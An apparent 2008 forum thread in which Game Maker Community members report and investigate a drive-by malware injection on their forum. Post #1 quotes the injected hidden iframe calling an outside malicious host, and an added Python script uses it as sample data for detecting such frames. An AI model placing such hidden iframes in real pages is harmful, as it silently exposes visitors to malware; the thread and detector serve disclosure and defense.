Malware Alert, Malware warning when visiting gmc.yoyogames.com |
Sep 7 2008, 12:11 PM
Post
#1
RoketGames Admin Group: GMC Member Posts: 1855 Joined: 8-December 04 From: Roket Enterprises Member No.: 17533 |
While browsing the GMC in Google Chrome, I suddenly got a malware warning from my browser. You'll only see this notice in Google Chrome, but I've checked with other people on my IM list, and they are receiving the same notice.
UPDATE: Christian Sciberras has found the location of the "hack".
QUOTE (Update)
<a href="http://www.yoyogames.com/make">Game Maker Home <iframe src="http://yourtraff.biz/tds/in.cgi?20" width="0" height="0" style="display:none"></iframe></a>
UPDATE 2: Firefox does show the warning, except they show it in the IFrame, whereas Google Chrome shows it over the entire site rendering, so it's only picked up in Google Chrome.
UPDATE 3: If you are using Internet Explorer, then you are vulnerable to this attack. Either use another browser, or add yourtraff.biz to your block list, like displayed. In either case, run a virus/malware scan straight away.
This post has been edited by Hach-Que: Sep 7 2008, 12:23 PM
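As an added illustration (not part of the original thread), markup like the snippet quoted in the post above can be caught by scanning a served page for iframes that are both hidden and loaded from a host outside the site's own domains. The function name, the trusted-domain list and the sample page (built around the quoted snippet plus two constructed benign frames) are assumptions.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

ZERO = re.compile(r"^0+(px|%)?$")
HIDDEN_CSS = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.I)

# Constructed sample page: lines 2-3 are based on the snippet quoted in the post;
# the other two frames are made-up benign embeds for contrast.
SAMPLE = '''<div id="nav">
<a href="http://www.yoyogames.com/make">Game Maker Home
<iframe src="http://yourtraff.biz/tds/in.cgi?20" width="0" height="0" style="display:none"></iframe></a>
<iframe src="http://www.yoyogames.com/banner" width="468" height="60"></iframe>
<iframe src="http://video.example/embed/1" width="640" height="360"></iframe>
</div>'''


class HiddenFrameFinder(HTMLParser):
    def __init__(self, trusted):
        super().__init__()
        self.trusted = tuple(t.lower() for t in trusted)
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = {k: (v or "") for k, v in attrs}
        host = (urlparse(a.get("src", "")).hostname or "").lower()
        # Relative URLs and frames from the site's own domains are not reported.
        if not host or any(host == t or host.endswith("." + t) for t in self.trusted):
            return
        reasons = []
        if ZERO.match(a.get("width", "").strip()) or ZERO.match(a.get("height", "").strip()):
            reasons.append("zero-size")
        if HIDDEN_CSS.search(a.get("style", "")):
            reasons.append("css-hidden")
        if reasons:  # a visible off-site embed is left alone; a hidden one is flagged
            self.findings.append({"src": a["src"], "host": host,
                                  "line": self.getpos()[0], "reasons": reasons})


def find_hidden_frames(html, trusted):
    """Return one finding per hidden iframe whose src host is not in `trusted`."""
    finder = HiddenFrameFinder(trusted)
    finder.feed(html)
    finder.close()
    return finder.findings


if __name__ == "__main__":
    for finding in find_hidden_frames(SAMPLE, ("yoyogames.com",)):
        print(finding)
```

Run against the HTML the server actually returns rather than a template on disk, since this kind of injection can sit in the forum's own code or skin.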
Sep 7 2008, 12:13 PM
Post
#2
Covac Software Group: GMC Member Posts: 2708 Joined: 3-July 06 From: Gozo, Malta, Europe Member No.: 53953 |
The hack is there on all browsers.
I was just browsing this, so I say the site got hacked in the last 5 minutes or so (1:10PM).
IMPORTANT: I suggest the forums are shut down temporarily.
This post has been edited by uuf6429: Sep 7 2008, 12:14 PM
Sep 7 2008, 12:15 PM
Post
#3
RoketGames Admin Group: GMC Member Posts: 1855 Joined: 8-December 04 From: Roket Enterprises Member No.: 17533 |
I'm quite well aware of this; the warning is only visible in Google Chrome though.
Sep 7 2008, 12:18 PM
Post
#4
I'm Looney for da Lunar! Group: GMC Member Posts: 1270 Joined: 29-May 07 From: USA Member No.: 79823 |
I thought they couldn't even use Iframe tags on IBM forums? Can't the Admins just disable Iframes?
Sep 7 2008, 12:19 PM
Post
#5
Covac Software Group: GMC Member Posts: 2708 Joined: 3-July 06 From: Gozo, Malta, Europe Member No.: 53953 |
It was not created by any user.
The iframe is embedded inside the forum code.
This post has been edited by uuf6429: Sep 7 2008, 12:19 PM
Sep 7 2008, 12:19 PM
Post
#6
GMC Member Group: GMC Member Posts: 152 Joined: 5-August 08 Member No.: 112253 |
I got it. Luckily my firewall and antivirus stopped it. It comes up telling me, and saying jar cache... then a certain number??? It seems like the gmc is under attack.
EDIT: It says loading from yourtraff.biz at the bottom? and augreat.mine.nu
This post has been edited by osl: Sep 7 2008, 12:41 PM
Sep 7 2008, 12:24 PM
Post
#7
Covac Software Group: GMC Member Posts: 2708 Joined: 3-July 06 From: Gozo, Malta, Europe Member No.: 53953 |
Now, now don't go on inventing theories.
This is surely a small scale attack otherwise we would have ended up with no forum till the next day, by which time we would learn that it's practically wiped out.
Edit: It seems to have been fixed.
Edit: No it's back :S
This post has been edited by uuf6429: Sep 7 2008, 12:27 PM
Sep 7 2008, 12:27 PM
Post
#8
GMC Member Group: GMC Member Posts: 152 Joined: 5-August 08 Member No.: 112253 |
QUOTE Now, now don't go on inventing theories. This is surely a small scale attack otherwise we would have ended up with no forum till the next day, by which time we would learn that it's practically wiped out.
It's not a theory. Try refreshing the main page and then look at the bar just above the Windows start bar. Then it does say downloading from sites other than the ones I'm on.
Edit: It isn't fixed on mine
This post has been edited by osl: Sep 7 2008, 12:28 PM
Sep 7 2008, 12:29 PM
Post
#9
Covac Software Group: GMC Member Posts: 2708 Joined: 3-July 06 From: Gozo, Malta, Europe Member No.: 53953 |
Hehe why do you think it's malware?
It's got to download something to actually attack your computer. Fortunately, my good ol' software does a good job keeping out the bad sh*t.
Sep 7 2008, 12:37 PM
Post
#10
GMC Member Group: GMC Member Posts: 274 Joined: 20-January 04 From: Hobbitland Member No.: 4964 |
God damn you beat me to it, I was going to create a topic about this
Well I'll include a screen shot anyway for good measure.
EDIT:
QUOTE If you are using Internet Explorer, then you are vulnerable to this attack. Either use another browser, or add yourtraff.biz to your block list, like displayed. In either case, run a virus/malware scan straight away.
Wrong. The only correct advice is: If you are using Internet Explorer: Use another browser.
This post has been edited by spacerat: Sep 7 2008, 12:42 PM
Sep 7 2008, 12:39 PM
Post
#11
Covac Software Group: GMC Member Posts: 2708 Joined: 3-July 06 From: Gozo, Malta, Europe Member No.: 53953 |
WARNING!!
Everybody leave this forum now!! I just analyzed their code, and it seems that just by letting this thing run (without an on-access scanner like Avast's) it will grab pages containing info from google services including:
Gmail
GAnalytics
Orkut
This post has been edited by uuf6429: Sep 7 2008, 12:41 PM
Sep 7 2008, 12:41 PM
Post
#12
I am stupid Group: GMC Member Posts: 2116 Joined: 27-October 03 From: Finland Member No.: 707 |
Is it just me or do I recall this happening many times before?
Sep 7 2008, 12:43 PM
Post
#13
GMC Member Group: GMC Member Posts: 274 Joined: 20-January 04 From: Hobbitland Member No.: 4964 |
QUOTE WARNING!! Everybody leave this forum now!! I just analyzed their code, and it seems that just by letting this thing run (without an on-access scanner like Avast's) it will grab pages containing info from google services including: Gmail GAnalytics Orkut
Can you prove this?
Sep 7 2008, 12:44 PM
Post
#14
GMC Member Group: GMC Member Posts: 716 Joined: 1-November 07 From: ~~~~~~~~~~~~~~~ Cool: Yes Member No.: 92008 |
It just happened today.
I was browsing GMC yesterday and it didn't happen.
EDIT: the site is rivatos.net, now.
This post has been edited by Un_t0uch: Sep 7 2008, 12:49 PM
Sep 7 2008, 12:52 PM
Post
#15
Covac Software Group: GMC Member Posts: 2708 Joined: 3-July 06 From: Gozo, Malta, Europe Member No.: 53953 |
QUOTE Is it just me or do I recall this happening many times before?
There's been other attempts, but shouldn't each new hack be fixed? The point is, with this they can do anything on the forum at the moment. Most browsers follow iframes blindly. Only an antivirus can stop them. Unless it's a special browser like Chrome.
QUOTE Can you prove this?
Try downloading their code. Then using some common sense (and knowledge of javascript), decode the existing obfuscated javascript into normal javascript. Keep doing this for all new links (of course DO NOT browse the links with your browser). Finally, you may follow up to pages which show your gmail messages (for example).
Edit: @Un_t0uch: The main site is "yourtraff.biz" but it keeps making new iframes to other sites like the one you mentioned. There is one tiny hole: the iframe. Through it, any other site affiliated/related to "yourtraff.biz" can add their own code. What triggered this notice is the virus on "rivatos.net". But as said, the hole is elsewhere.
This post has been edited by uuf6429: Sep 7 2008, 12:55 PM
Sep 7 2008, 12:52 PM
Post
#16
GMC Member Group: GMC Member Posts: 502 Joined: 13-April 07 From: North East England Member No.: 76225 |
It's stopped showing the message for me in Chrome
Sep 7 2008, 12:54 PM
Post
#17
GMC Member Group: GMC Member Posts: 1184 Joined: 25-March 07 Member No.: 74405 |
I see this too.. This proves that we can't live without an antivirus because some idiots think they're smart and edit the page. I hate them all.
Sep 7 2008, 12:57 PM
Post
#18
Covac Software Group: GMC Member Posts: 2708 Joined: 3-July 06 From: Gozo, Malta, Europe Member No.: 53953 |
AS I SAID if that site "rivatos.net" is removed, you won't see the virus warning anymore BUT the security hole is still there.
Sep 7 2008, 12:59 PM
Post
#19
GMC Member Group: GMC Member Posts: 152 Joined: 5-August 08 Member No.: 112253 |
It is still in Internet Explorer, but it seems like it is from a variety of sites. rivatos.net, augreat.mine.nu and yourtraff.biz seem as if they are behind it. And anytime I upload one of these pages... multiple trojans appear
QUOTE AS I SAID if that site "rivatos.net" is removed, you won't see the virus warning anymore BUT the security hole is still there.
I still get it... even though I've removed rivatos.net. I advise everyone to block augreat.mine.nu too
This post has been edited by osl: Sep 7 2008, 01:05 PM
Sep 7 2008, 01:05 PM
Post
#20
GMC Member Group: GMC Member Posts: 569 Joined: 10-June 06 From: ►Flanders, Belgium Member No.: 52068 |
Damn, I just wanted to make a topic about it